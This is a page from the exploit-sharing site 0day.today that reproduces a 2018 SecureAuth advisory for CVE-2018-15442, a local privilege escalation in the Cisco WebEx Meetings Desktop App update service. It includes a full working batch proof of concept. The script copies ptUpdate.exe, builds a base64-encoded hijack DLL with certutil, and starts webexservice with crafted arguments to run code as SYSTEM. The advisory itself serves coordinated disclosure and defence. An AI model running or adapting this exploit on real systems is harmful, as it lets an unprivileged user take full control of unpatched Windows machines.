0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco WebEx Meetings Privilege Escalation Vulnerability
Author
Risk
[
Security Risk High
]0day-ID
Category
Date add
CVE
Platform
Cisco WebEx Meetings Elevation of Privilege Vulnerability *1. *Advisory Information** Title: Cisco WebEx Meetings Elevation of Privilege Vulnerability Advisory ID: CORE-2018-0011 Advisory URL: http://www.secureauth.com/labs/advisories/cisco-webex-meetings-elevation-privilege-vulnerability Date published: 2018-11-27 Date of last update: 2018-11-27 Vendors contacted: Cisco Release mode: Coordinated release *2. *Vulnerability Information** Class: OS command injection [CWE-78] Impact: Code execution Remotely Exploitable: No Locally Exploitable: Yes CVE Name: CVE-2018-15442 *3. *Vulnerability Description** Cisco's Webex Meetings website states that [1]: Cisco Webex Meetings: Simply the Best Video Conferencing and Online Meetings. With Cisco Webex Meetings, joining is a breeze, audio and video are clear, and screen sharing is easier than ever. We help you forget about the technology, to focus on what matters. A vulnerability in the update service of Cisco Webex Meetings Desktop App for Windows could allow a local attacker to elevate privileges. This vulnerability is related to a previous security issue fixed by Cisco in October. *4. *Vulnerable Packages* *. Cisco Webex Meetings Desktop App releases prior to 33.6.4 . Cisco Webex Productivity Tools releases 32.6.0 and later prior to 33.0.6 *5. *Vendor Information, Solutions and Workarounds** Cisco released a new fixed version and updated its security notice: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection *6. *Credits** This vulnerability was discovered and researched by Marcos Accossatto from SecureAuth Exploits' Writers Team. The publication of this advisory was coordinated by Leandro Cuozzo from SecureAuth Advisories Team. *7. *Technical Description / Proof of Concept Code** *7.1. *Privilege Escalation** [CVE-2018-15442] The update service of Cisco Webex Meetings Desktop App for Windows does not properly validate user-supplied parameters. An unprivileged local attacker could exploit this vulnerability by invoking the update service command with a crafted argument. This will allow the attacker to run arbitrary commands with SYSTEM user privileges. The vulnerability can be exploited by copying to an a local attacker controller folder, the ptUpdate.exe binary. Also, a malicious dll must be placed in the same folder, named wbxtrace.dll. To gain privileges, the attacker must start the service with the command line: sc start webexservice install software-update 1 "attacker-controlled-path" (if the parameter 1 doesn't work, then 2 should be used) Proof of Concept: /----- REM Contents of PoC.bat REM This batch will copy the ptUpdate.exe from the installation folder to the current folder REM Then it will generate a simple dll that will execute notepad.exe on load. The dll will be created using certutil.exe and named wbxtrace.dll REM Finally, the webexservice service will be started, with the showed parameters REM The result should be a notepad.exe with SYSTEM user privileges @echo off :CheckOS IF EXIST "%PROGRAMFILES(X86)%" (GOTO 64BIT) ELSE (GOTO 32BIT) :64BIT copy "%PROGRAMFILES(X86)%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :32BIT copy "%PROGRAMFILES%\Webex\Webex\Applications\ptUpdate.exe" . GOTO END :END echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAsAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACVyJXZ0an7itGp+4rRqfuKLYnpitOp+4pftuiK1Kn7ilJpY2jRqfuKAAAAAAAAAABQRQAATAEEALCa5 > dll.txt echo VsAAAAAAAAAAOAADiELAQUMAAIAAAAGAAAAAAAAABAAAAAQAAAAIAAAAAAAEAAQAAAAAgAABAAAAAQAAAAEAAAAAAAAAABQAAAABAAA3GEAAAIAAAAAABAAABAAAAAAEAAAEAAAAAAAABAAAABgIAAANQAAAAggAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC50ZXh0AAAAnQAAAAAQAAAAAgAAAAQAAAAAAAAAAAAAAAAAACAAAGAucmRhdGEAAJUAAAAAIAAAAAIAAAAGAAAAAAAAAAAAAAAAAABAAABALmRhdGEAAAAQAAAAADAAAAACAAAACAAAAAAAAAAAAAAAAAAAQAAAwC5yZWxvYwAAGAAAAABAAAA >> dll.txt echo AAgAAAAoAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFWL7IPErIN9DAF1NGoAakSNRbxQ6DcAAADHRbxEAAAAjUWsUI1FvFBqAGoAagBqAGoAagBoADAAEGoA6AoAAAC4AQAAAMnCDADM/yUAIAAQVYvsi1UIi0UQi00MwekFg/ >> dll.txt echo kAdB2JAolCBIlCCIlCDIlCEIlCFIlCGIlCHIPCIEl144NlDB+DfQwAdA6LTQzB6QKJAoPCBEl1+MnCDAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAAAwIAAAAAAAAAAAAABKIAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOCAAAAAAAABPAENyZWF0ZVByb2Nlc3NBAABrZXJuZWwzMi5kbGwAAAAAAAAAAAAAAAAAALCa5VsAAAAAiCAAAAEAAAAAAAAAAAAAAIggAACIIAAAiCAAAHNrZWxldG9uL >> dll.txt echo mRsbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABub3RlcGF >> dll.txt echo kLmV4ZQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAMAAAANTBMMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA >> dll.txt certutil -decode dll.txt wbxtrace.dll SET mypath=%~dp0 %mypath:~0,-1% sc start webexservice install software-update 1 %mypath:~0,-1% sc start webexservice install software-update 2 %mypath:~0,-1% -----/ *8. *Report Timeline* *2018-11-09: SecureAuth sent an initial notification to the Cisco PSIRT including a draft advisory. 2018-11-09: Cisco acknowledged the vulnerability and replied that they were working on a fix and they were planning to release it within the next two weeks. In addition, Cisco informed that they will update their previous security advisory to mention that the original fix was incomplete and to refer to the new ones fixes. 2018-11-09: SecureAuth thanked the quick response. 2018-11-19: Cisco notified that they will update the advisory on Tuesday 27th. 2018-11-27: Advisory CORE-2018-0011 published. # 0day.today [2024-09-28] #